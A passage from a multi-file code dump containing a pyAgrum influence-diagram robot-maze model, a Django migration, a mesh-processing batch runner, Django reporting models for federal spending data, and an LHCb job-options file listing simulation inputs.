print(f"{level} : {mid-start:7.3f}s - {stop-mid:7.3f}s - treewidth={maxtw} - size= {human_readable(maxsize)}")
return timeInf,timeJonc,largeurArbre,tailleMem
maze=["---------",
"-- --",
"- - - -",
"-- - - --",
"- - - $-",
"-- --",
"---------"]
nbStage=2
xInitial=3
yInitial=2
ID=createIDRobot(nbStage,xInitial,yInitial,maze)
def createLIMIDRobot(n,xInitial,yInitial,maze):
"""
builds the relaxed ID without computing the SIS
chances holds all the chance-node ids of the ID; by convention, if the id is equal to
0 mod(6) --> the node is an x
1 mod(6) --> the node is a y
2 mod(6) --> the node is an n
3 mod(6) --> the node is an e
4 mod(6) --> the node is an s
5 mod(6) --> the node is a w
decision holds all the decision-node ids of the ID; by convention, the id
6*n+i, for every i in 0,...,n-1, is the decision node of stage i.
"""
"""
Method building the influence diagram for the robot example from the paper "2013_Solving_Limited_Memory_Influence_Diagrams_Using_BranchAndBound"
Input:
n - number of stages
xInitial - initial x coordinate where the robot is placed
yInitial - initial y coordinate where the robot is placed
Output:
ID - the influence diagram modelling the problem
"""
#gris is the set of coordinates of the grey (wall) cells
cases,gris,caseObj,nbLignes,nbColonnes=getCasesAndGris2(maze)
#lists of the cells from which a step in a given direction is possible (i.e. no wall in that direction from that cell)
casesOuPossibleAllerGauche=[]
casesOuPossibleAllerHaut=[]
casesOuPossibleAllerDroite=[]
casesOuPossibleAllerBas=[]
#build the lists above
for x in range(nbLignes):
for y in range(nbColonnes):
if(cases[x,y,0]==0):
casesOuPossibleAllerGauche.append([x,y])
if(cases[x,y,1]==0):
casesOuPossibleAllerHaut.append([x,y])
if(cases[x,y,2]==0):
casesOuPossibleAllerDroite.append([x,y])
if(cases[x,y,3]==0):
casesOuPossibleAllerBas.append([x,y])
#create the ID
ID=gum.fastID("")
#all the chance nodes, grouped by stage (index 0 is the first stage)
chances=np.zeros((n,6))
#all the decision nodes; index 0 is the first stage's
decision=np.zeros(n)
for i in range(n):
#define the names once, to avoid unnecessary operations
x=f"x_{i}"
y=f"y_{i}"
ns=f"ns_{i}"
es=f"es_{i}"
ss=f"ss_{i}"
ws=f"ws_{i}"
d=f"d_{i}"
#create the nodes
#add the x-position node
chances[i][0]=int(ID.addChanceNode(gum.LabelizedVariable(x,"",nbLignes),6*i))
#add the y-position node
chances[i][1]=int(ID.addChanceNode(gum.LabelizedVariable(y,"",nbColonnes),6*i+1))
#add the sensor nodes, one per cardinal direction
chances[i][2]=ID.addChanceNode(gum.LabelizedVariable(ns,"",2),6*i+2)
chances[i][3]=ID.addChanceNode(gum.LabelizedVariable(es,"",2),6*i+2+1)
chances[i][4]=ID.addChanceNode(gum.LabelizedVariable(ss,"",2),6*i+2+2)
chances[i][5]=ID.addChanceNode(gum.LabelizedVariable(ws,"",2),6*i+2+3)
#add the decision node
decision[i]=int(ID.addDecisionNode(gum.LabelizedVariable(d,"",5),i+50000))
#create the arcs between x,y and the current stage's sensors
ID.addArc(x,y)
ID.addArc(x,ns)
ID.addArc(x,es)
ID.addArc(x,ss)
ID.addArc(x,ws)
ID.addArc(y,ns)
ID.addArc(y,es)
ID.addArc(y,ss)
ID.addArc(y,ws)
#create the arcs from the sensor chance nodes of the current stage only
#towards its decision node (unlike createIDRobot, which uses all stages)
stage=i
ID.addArc(int(chances[(stage)][2]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][3]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][4]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][5]),ID.idFromName(d))
#create the arcs from x_i-1 to x_i and from y_i-1 to y_i (only from the second stage on)
if(i>0):
ID.addArc(f"x_{i-1}",y)
ID.addArc(f"x_{i-1}",x)
ID.addArc(f"y_{i-1}",y)
ID.addArc(f"y_{i-1}",x)
#ID.addArc(f"d_{i-1}",f"d_{i}")
#create the arcs from the decision node of stage i-1 to x_i and y_i
ID.addArc(f"d_{i-1}",x)
ID.addArc(f"d_{i-1}",y)
#fill the potentials of the sensor chance nodes ns es ss ws, with support {0=no wall,1=wall}
for h in range(nbLignes):
for j in range(nbColonnes):
if([h,j] in casesOuPossibleAllerHaut):
ID.cpt(ns)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ns)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerBas):
ID.cpt(ss)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ss)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerDroite):
ID.cpt(es)[{x:h,y:j}]=[1,0]
else:
ID.cpt(es)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerGauche):
ID.cpt(ws)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ws)[{x:h,y:j}]=[0,1]
if [h,j] in gris:
ID.cpt(ns)[{x:h,y:j}]=[0,1]
ID.cpt(es)[{x:h,y:j}]=[0,1]
ID.cpt(ss)[{x:h,y:j}]=[0,1]
ID.cpt(ws)[{x:h,y:j}]=[0,1]
"""#fill the potentials of the position nodes x y at the first stage
if(i==0):
ID.cpt(x)[xInitial]=1
ID.cpt(y)[{x:xInitial,y:yInitial}]=1
#fill the potentials of the position nodes x y at the later stages
else:
remplirID(ID,x,fillX,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)
remplirID(ID,y,fillY,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)"""
#add the arcs between the last decision node, the last chance nodes x and y, and the utility node
xn=f"x_{n}"
yn=f"y_{n}"
ID.addArc(int(decision[n-1]),ID.addChanceNode(gum.LabelizedVariable(xn,"",nbLignes)))
ID.addArc(int(decision[n-1]),ID.addChanceNode(gum.LabelizedVariable(yn,"",nbColonnes)))
ID.addArc(xn,yn)
ID.addUtilityNode(gum.LabelizedVariable("u","",1))
ID.addArc(xn,"u")
ID.addArc(yn,"u")
ID.addArc(f"x_{n-1}",xn)
ID.addArc(f"y_{n-1}",xn)
ID.addArc(f"x_{n-1}",yn)
ID.addArc(f"y_{n-1}",yn)
#Fill the potentials of the last chance nodes and of the utility node
"""remplirID(ID,xn,fillX,n,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)
remplirID(ID,yn,fillY,n,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)"""
l=[]
ID.utility(ID.idFromName("u"))[{f"x_{n}":caseObj[0],f"y_{n}":caseObj[1]}]=1
for k in range(n):
x=f"x_{k}"
y=f"y_{k}"
l.append(x)
l.append(y)
l=l+[xn,yn]
for node in l:
for i in ID.cpt(node).loopIn():
ID.cpt(node).set(i,np.random.rand())
ID.cpt(node).normalizeAsCPT()
return ID
def remplirID(ID,NomNoeud,fonctionFill,stage,casesOuPossibleAllerGauche,
              casesOuPossibleAllerHaut,
              casesOuPossibleAllerDroite,
              casesOuPossibleAllerBas,gris):
    """
    Fills the potential table of the x and y position nodes at stages after the first one.
    Input:
    InfluenceDiagram ID - the influence diagram in which to find all the nodes
    String NomNoeud - the name of the node whose potential table we want to fill
    function fonctionFill - the function used to fill the cells of the table
    Integer stage - integer identifying the current stage
    Output:
    void
    """
    I=gum.Instantiation(ID.cpt(NomNoeud))
    while not I.end():
        ID.cpt(NomNoeud).set(I,fonctionFill(I,stage,casesOuPossibleAllerGauche,
                                            casesOuPossibleAllerHaut,
                                            casesOuPossibleAllerDroite,
                                            casesOuPossibleAllerBas,gris))
        I.inc()
def fillX(I,i,casesOuPossibleAllerGauche,
          casesOuPossibleAllerHaut,
          casesOuPossibleAllerDroite,
          casesOuPossibleAllerBas,gris):
    """
    Determines which probability to put in a cell of the potential table of the chance node corresponding to the robot's X position (abscissa) at a given stage.
    Input:
    Instantiation I - a cell of the potential table being filled; it is inspected to decide which probability this cell gets.
    Integer i - integer identifying the current stage.
    """
    valeurXStageDavant,valeurYStageDavant,valeurX,decisionDStageDavant=[I.val(nomNoeud) for nomNoeud in [f"x_{i-1}",f"y_{i-1}",f"x_{i}",f"d_{i-1}"]]
    if([valeurXStageDavant,valeurYStageDavant] in gris):
        return 0
    if(abs(valeurX-valeurXStageDavant)>1):
        return 0
    #-----------------------
    if(decisionDStageDavant==0): #decision = left
        if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
            if(valeurX==valeurXStageDavant-1):
                return 0.89+0.01
            if(valeurX==valeurXStageDavant):
                return 0.089
            if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite): #additionally check that a step right is possible before assigning it a probability
                return 0.01
        else:
            if(valeurX==valeurXStageDavant-1): #(already 0 by default, kept for code readability)
                return 0
            if(valeurX==valeurXStageDavant):
                return 0.089
            if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
                return 0.01
    #-----------------------
    if(decisionDStageDavant==1): #decision = up
        if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerHaut):
            if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
                return 0.01
            if(valeurX==valeurXStageDavant):
                return 0.89+0.089
            if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
                return 0.01
        else:
            if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
                return 0.01
            if(valeurX==valeurXStageDavant): #not sure which probability to use here: 0.89, 0.089 or 0??
                return 0.089
            if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
                return 0.01
    #-----------------------
    if(decisionDStageDavant==2): #decision = right
        if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
            if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
                return 0.01
            if(valeurX==valeurXStageDavant):
                return 0.089
            if(valeurX==valeurXStageDavant+1):
                return 0.01+0.89
        else:
            if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
                return 0.01
            if(valeurX==valeurXStageDavant): #not sure which probability to use here: 0.89, 0.089 or 0??
                return 0.089
            if(valeurX==valeurXStageDavant+1):
                return 0
    #-----------------------
    if(decisionDStageDavant==3): #decision = down
        if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas):
            if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
                return 0.01
            if(valeurX==valeurXStageDavant):
                return 0.89+0.089
            if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
                return 0.01
        else:
            if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
                return 0.01
            if(valeurX==valeurXStageDavant): #not sure which probability to use here: 0.89, 0.089 or 0??
                return 0.089
            if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
                return 0.01
    #-----------------------
    if(decisionDStageDavant==4): #decision = stay in place
        if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
            return 0.01
        if(valeurX==valeurXStageDavant):
            return 0.89
        if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
            return 0.01
    return 0
def fillY(I,i,casesOuPossibleAllerGauche,
          casesOuPossibleAllerHaut,
          casesOuPossibleAllerDroite,
          casesOuPossibleAllerBas,gris):
    """
    Determines which probability to put in a cell of the potential table of the chance node corresponding to the robot's Y position (ordinate) at a given stage.
    Input:
    Instantiation I - a cell of the potential table being filled; it is inspected to decide which probability this cell gets.
    Integer i - integer identifying the current stage.
    """
    valeurXStageDavant,valeurYStageDavant,valeurX,valeurY,decisionDStageDavant=[I.val(nomNoeud) for nomNoeud in [f"x_{i-1}",f"y_{i-1}",f"x_{i}",f"y_{i}",f"d_{i-1}"]]
    if([valeurXStageDavant,valeurYStageDavant] in gris):
        return 0
    if(abs(valeurX-valeurXStageDavant)>1 or abs(valeurY-valeurYStageDavant)>1):
        return 0
    #-----------------------
    if(decisionDStageDavant==0): #decision = left
        if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
            if(valeurX==valeurXStageDavant): #X did not move
                if(valeurY==valeurYStageDavant): #Y did not move
                    return 0.089
                if(valeurY==valeurYStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas): #Y moved down
                    return 0.001
            if(valeurX==valeurXStageDavant-1): #X took a step left
                if(valeurY==valeurYStageDavant): #Y did not move
                    return 0.89
                if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas): #Y moved down (note: valeurX, not valeurXStageDavant, because X has moved)
                    return 0.001
            if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite): #X took a step right
                if(valeurY==valeurYStageDavant): #Y did not move
                    return 1-0.001
                if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas): #Y moved down
                    return 0.001
    #-----------------------
    if(decisionDStageDavant==1): #decision = up
        if([valeurX,valeurYStageDavant] in casesOuPossibleAllerHaut): #NOTE: valeurX IS CHECKED DIRECTLY HERE
            if(valeurY==valeurYStageDavant-1): #Y moved up
                return 0.89
            if(valeurY==valeurYStageDavant): #Y did not move
                return 0.089
            if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas): #Y moved down
                return 0.001
    #-----------------------
    if(decisionDStageDavant==2): #decision = right
        if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
            if(valeurX==valeurXStageDavant): #X did not move
                if(valeurY==valeurYStageDavant): #Y did not move
                    return 0.089
                if(valeurY==valeurYStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas): #Y moved down
                    return 0.001
            if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche): #X took a step left
                if(valeurY==valeurYStageDavant): #Y did not move
                    return 1-0.001
                if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas): #Y moved down (note: valeurX, not valeurXStageDavant, because X has moved)
                    return 0.001
            if(valeurX==valeurXStageDavant+1): #X took a step right
                if(valeurY==valeurYStageDavant): #Y did not move
                    return 0.89
                if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas): #Y moved down
                    return 0.001
    #-----------------------
    if(decisionDStageDavant==3): #decision = down
        if([valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):
            if(valeurY==valeurYStageDavant+1): #Y moved down
                return 0.89
            if(valeurY==valeurYStageDavant): #Y did not move
                return 0.089
            if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas): #note: this condition duplicates the branch above, so it is unreachable as written
                return 0.001
    #-----------------------
    if(decisionDStageDavant==4): #decision = stay in place
        if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):
            return 0.001
    return 0
def getCasesAndGris2(maze):
    """
    Function that returns:
    gris : list of [row, col] pairs giving the coordinates of the greyed-out (wall) cells
    cases : 3-dimensional array storing, for each cardinal direction and each cell, whether a step in that
    direction is possible (i.e. there is no wall)
    convention: cases[x,y,i]=0 if there is no wall in direction i from cell x,y, and cases[x,y,i]=1 otherwise. i belongs to [0,1,2,3], corresponding to west, north, east, south respectively.
    It also returns caseObj (the goal cell marked "$"), nbLignes and nbColonnes.
    """
    nbLignes=len(maze)
    nbColonnes=len(maze[0])
    cases=np.zeros((nbLignes,nbColonnes,4)) #stores, per direction, whether a step in that direction is possible (0 yes, 1 no)
    gris=[]
    caseObj=None #initialized so the function still returns if the maze contains no "$" cell
    for ligne in range(nbLignes):
        cases[ligne,0,0]=1 #on the first column we cannot go left
        cases[ligne,nbColonnes-1,2]=1 #on the last column we cannot go right
        for colonne in range(nbColonnes):
            cases[0,colonne,1]=1 #on the first row we cannot go up
            cases[nbLignes-1,colonne,3]=1 #on the last row we cannot go down
            if(maze[ligne][colonne]=="|" or maze[ligne][colonne]=="-"):
                gris.append([ligne,colonne])
                cases[ligne,colonne,0]=1 #from inside a wall we can go nowhere
                cases[ligne,colonne,1]=1
                cases[ligne,colonne,2]=1
                cases[ligne,colonne,3]=1
                if colonne>0 :
                    cases[ligne,colonne-1,2]=1 #look right (cases[ligne,colonne-1] is to the left of maze[ligne][colonne])
                if ligne<nbLignes-1 :
                    cases[ligne+1,colonne,1]=1 #up
                if ligne>0 :
                    cases[ligne-1,colonne,3]=1 #down
                if colonne<nbColonnes-1 :
                    cases[ligne,colonne+1,0]=1 #left
            elif maze[ligne][colonne]=="$" :
                caseObj=[ligne,colonne]
    return cases,gris,caseObj,nbLignes,nbColonnes
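The wall-encoding convention documented in getCasesAndGris2 can be illustrated with a tiny standalone sketch (the 3x3 maze below is hypothetical; only NumPy is assumed): cases[row, col, i] is 1 when a step in direction i (0=west, 1=north, 2=east, 3=south) is blocked, either by the grid border or by an adjacent wall cell.

```python
import numpy as np

# Hypothetical 3x3 maze: '.' free cell, '|' wall, '$' goal (same symbols as getCasesAndGris2).
maze = ["...",
        ".|.",
        "..$"]
nbLignes, nbColonnes = len(maze), len(maze[0])
cases = np.zeros((nbLignes, nbColonnes, 4))
for ligne in range(nbLignes):
    cases[ligne, 0, 0] = 1               # first column: cannot step west
    cases[ligne, nbColonnes - 1, 2] = 1  # last column: cannot step east
for colonne in range(nbColonnes):
    cases[0, colonne, 1] = 1             # first row: cannot step north
    cases[nbLignes - 1, colonne, 3] = 1  # last row: cannot step south
for ligne in range(nbLignes):
    for colonne in range(nbColonnes):
        if maze[ligne][colonne] == "|":
            cases[ligne, colonne, :] = 1          # no move is possible from inside a wall
            if colonne > 0:
                cases[ligne, colonne - 1, 2] = 1  # west neighbour cannot step east into the wall
            if colonne < nbColonnes - 1:
                cases[ligne, colonne + 1, 0] = 1  # east neighbour cannot step west
            if ligne > 0:
                cases[ligne - 1, colonne, 3] = 1  # neighbour above cannot step south
            if ligne < nbLignes - 1:
                cases[ligne + 1, colonne, 1] = 1  # neighbour below cannot step north

print(int(cases[1, 0, 2]))  # 1: cell (1,0) cannot step east into the wall at (1,1)
print(int(cases[0, 0, 2]))  # 0: cell (0,0) can step east
```

Note that the blocked-step updates for a wall touch all four neighbours, which is why the sensor nodes ns/es/ss/ws built from these tables see walls from adjacent cells.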
# File: iaso/migrations/0092_auto_20210611_0951.py (repo: BLSQ/iaso-copy, license: MIT)
# Generated by Django 3.1.12 on 2021-06-11 09:51
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ("iaso", "0091_merge_20210609_1748"),
    ]

    operations = [
        migrations.AlterField(
            model_name="algorithmrun",
            name="result",
            field=models.JSONField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name="exportlog",
            name="received",
            field=models.JSONField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name="exportlog",
            name="sent",
            field=models.JSONField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name="exportrequest",
            name="params",
            field=models.JSONField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name="exportrequest",
            name="result",
            field=models.JSONField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name="form",
            name="fields",
            field=models.JSONField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name="formversion",
            name="form_descriptor",
            field=models.JSONField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name="instance",
            name="json",
            field=models.JSONField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name="mappingversion",
            name="json",
            field=models.JSONField(),
        ),
        migrations.AlterField(
            model_name="task",
            name="params",
            field=models.JSONField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name="task",
            name="queue_answer",
            field=models.JSONField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name="task",
            name="result",
            field=models.JSONField(blank=True, null=True),
        ),
    ]
# File: Projects/FEMShell/batch.py (repo: ipc-sim/IDP, license: Apache-2.0)
import subprocess
# Intel MKL number of threads
numThreads = '16'
baseCommand = 'export MKL_NUM_THREADS=' + numThreads + '\nexport OMP_NUM_THREADS=' + numThreads + '\nexport VECLIB_MAXIMUM_THREADS=' + numThreads + '\n'
# run
# run: one (meshName, smoothIntensity, magnitude, frameNum) entry per case of 12-14_normal_flow.py
normalFlowRuns = [
    ('cat',            '0.5', '5e-3',  '10'),
    ('hand',           '0.5', '5e-3',  '3'),
    ('walnut71K',      '0.1', '5e-3',  '8'),
    ('bunny3K',        '0.5', '-5e-3', '50'),
    ('feline',         '1',   '-5e-3', '50'),
    ('font_Tao',       '0.5', '5e-3',  '10'),
    ('font_Peng',      '0.5', '5e-3',  '5'),
    ('font_delicious', '0.5', '5e-3',  '12'),
    ('font_seriously', '10',  '5e-3',  '25'),
]
script = '12-14_normal_flow.py'
for meshName, smoothIntensity, magnitude, frameNum in normalFlowRuns:
    runCommand = baseCommand + 'python3 ' + script + ' ' + meshName + ' ' + smoothIntensity + ' ' + magnitude + ' ' + frameNum
    if subprocess.call([runCommand], shell=True):
        continue
for script in ['16_fix_char_seq.py']:
    for seqName in ['Rumba_Dancing_unfixed', 'Kick_unfixed']:
        runCommand = baseCommand + 'python3 ' + script + ' ' + seqName
        if subprocess.call([runCommand], shell=True):
            continue
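The script above injects Intel MKL/OMP thread limits by prefixing every shell command with `export` statements. A hypothetical, behavior-equivalent alternative (a sketch, not the project's actual approach) is to pass the same variables through `subprocess`'s `env` parameter, which avoids string-building a shell prefix entirely:

```python
import os
import subprocess
import sys

# Pass the thread-count variables through the child process environment
# instead of an `export ...` shell prefix (variable names as in the script above).
numThreads = '16'
env = dict(os.environ,
           MKL_NUM_THREADS=numThreads,
           OMP_NUM_THREADS=numThreads,
           VECLIB_MAXIMUM_THREADS=numThreads)
# The child sees the variables without any shell involved.
ret = subprocess.call([sys.executable, '-c',
                       "import os; assert os.environ['OMP_NUM_THREADS'] == '16'"],
                      env=env)
print(ret)  # 0 when the child's assertion passes
```

Passing an argument list with `env=` also sidesteps `shell=True`, so mesh names containing shell metacharacters would not need quoting.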
# File: usaspending_api/reporting/models.py (repo: ststuck/usaspending-api, license: CC0-1.0)
from django.db import models
class ReportingAgencyTas(models.Model):
    """
    Model representing reporting data for appropriation and object class program activity values grouped by TAS and
    period
    """

    reporting_agency_tas_id = models.AutoField(primary_key=True)
    toptier_code = models.TextField()
    fiscal_year = models.IntegerField()
    fiscal_period = models.IntegerField()
    tas_rendering_label = models.TextField()
    appropriation_obligated_amount = models.DecimalField(max_digits=23, decimal_places=2)
    object_class_pa_obligated_amount = models.DecimalField(max_digits=23, decimal_places=2)
    diff_approp_ocpa_obligated_amounts = models.DecimalField(max_digits=23, decimal_places=2)

    class Meta:
        db_table = "reporting_agency_tas"
        indexes = [
            models.Index(fields=["fiscal_year", "fiscal_period", "toptier_code"], name="reporting_agency_tas_group_idx")
        ]


class ReportingAgencyMissingTas(models.Model):
    """
    Model representing missing reporting data for appropriation and object class program activity values grouped by TAS
    and period
    """

    reporting_agency_missing_tas_id = models.AutoField(primary_key=True)
    toptier_code = models.TextField()
    fiscal_year = models.IntegerField()
    fiscal_period = models.IntegerField()
    tas_rendering_label = models.TextField()
    obligated_amount = models.DecimalField(max_digits=23, decimal_places=2)

    class Meta:
        db_table = "reporting_agency_missing_tas"
        indexes = [
            models.Index(fields=["fiscal_year", "fiscal_period", "toptier_code"], name="rpt_agency_missing_tas_grp_idx")
        ]


class ReportingAgencyOverview(models.Model):
    """
    Model representing reporting data for appropriation and object class program activity values grouped by TAS and
    period
    """

    reporting_agency_overview_id = models.AutoField(primary_key=True)
    toptier_code = models.TextField()
    fiscal_year = models.IntegerField()
    fiscal_period = models.IntegerField()
    total_dollars_obligated_gtas = models.DecimalField(max_digits=23, decimal_places=2, null=True)
    total_budgetary_resources = models.DecimalField(max_digits=23, decimal_places=2, null=True)
    total_diff_approp_ocpa_obligated_amounts = models.DecimalField(max_digits=23, decimal_places=2, null=True)
    unlinked_procurement_c_awards = models.IntegerField(null=True)
    unlinked_assistance_c_awards = models.IntegerField(null=True)
    unlinked_procurement_d_awards = models.IntegerField(null=True)
    unlinked_assistance_d_awards = models.IntegerField(null=True)
    linked_procurement_awards = models.IntegerField(null=True)
    linked_assistance_awards = models.IntegerField(null=True)

    class Meta:
        db_table = "reporting_agency_overview"
        indexes = [
            models.Index(fields=["fiscal_year", "fiscal_period", "toptier_code"], name="reporting_agency_ovr_group_idx")
        ]
# File: ksteta3pi/PotentialBackgrounds/MC_12_11134020_MagDown.py (repo: Williams224/davinci-scripts, license: MIT)
#-- GAUDI jobOptions generated on Fri Jul 24 16:53:25 2015
#-- Contains event types :
#-- 11134020 - 119 files - 2018489 events - 438.56 GBytes
#-- Extra information about the data processing phases:
#-- Processing Pass Step-124834
#-- StepId : 124834
#-- StepName : Reco14a for MC
#-- ApplicationName : Brunel
#-- ApplicationVersion : v43r2p7
#-- OptionFiles : $APPCONFIGOPTS/Brunel/DataType-2012.py;$APPCONFIGOPTS/Brunel/MC-WithTruth.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-124620
#-- StepId : 124620
#-- StepName : Digi13 with G4 dE/dx
#-- ApplicationName : Boole
#-- ApplicationVersion : v26r3
#-- OptionFiles : $APPCONFIGOPTS/Boole/Default.py;$APPCONFIGOPTS/Boole/DataType-2012.py;$APPCONFIGOPTS/Boole/Boole-SiG4EnergyDeposit.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-124632
#-- StepId : 124632
#-- StepName : TCK-0x409f0045 Flagged for Sim08 2012
#-- ApplicationName : Moore
#-- ApplicationVersion : v14r8p1
#-- OptionFiles : $APPCONFIGOPTS/Moore/MooreSimProductionWithL0Emulation.py;$APPCONFIGOPTS/Conditions/TCK-0x409f0045.py;$APPCONFIGOPTS/Moore/DataType-2012.py;$APPCONFIGOPTS/L0/L0TCK-0x0045.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-126434
#-- StepId : 126434
#-- StepName : Sim08e - 2012 - MD - Pythia8
#-- ApplicationName : Gauss
#-- ApplicationVersion : v45r7
#-- OptionFiles : $APPCONFIGOPTS/Gauss/Sim08-Beam4000GeV-md100-2012-nu2.5.py;$DECFILESROOT/options/@{eventType}.py;$LBPYTHIA8ROOT/options/Pythia8.py;$APPCONFIGOPTS/Gauss/G4PL_FTFP_BERT_EmNoCuts.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : dddb-20130929-1
#-- CONDDB : sim-20130522-1-vc-md100
#-- ExtraPackages : AppConfig.v3r193;DecFiles.v27r22
#-- Visible : Y
#-- Processing Pass Step-124630
#-- StepId : 124630
#-- StepName : Stripping20-NoPrescalingFlagged for Sim08
#-- ApplicationName : DaVinci
#-- ApplicationVersion : v32r2p1
#-- OptionFiles : $APPCONFIGOPTS/DaVinci/DV-Stripping20-Stripping-MC-NoPrescaling.py;$APPCONFIGOPTS/DaVinci/DataType-2012.py;$APPCONFIGOPTS/DaVinci/InputType-DST.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
from Gaudi.Configuration import *
from GaudiConf import IOHelper
IOHelper('ROOT').inputFiles(['LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000001_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000002_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000003_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000004_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000005_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000006_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000007_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000008_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000009_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000010_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000011_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000012_1.allstreams.dst',
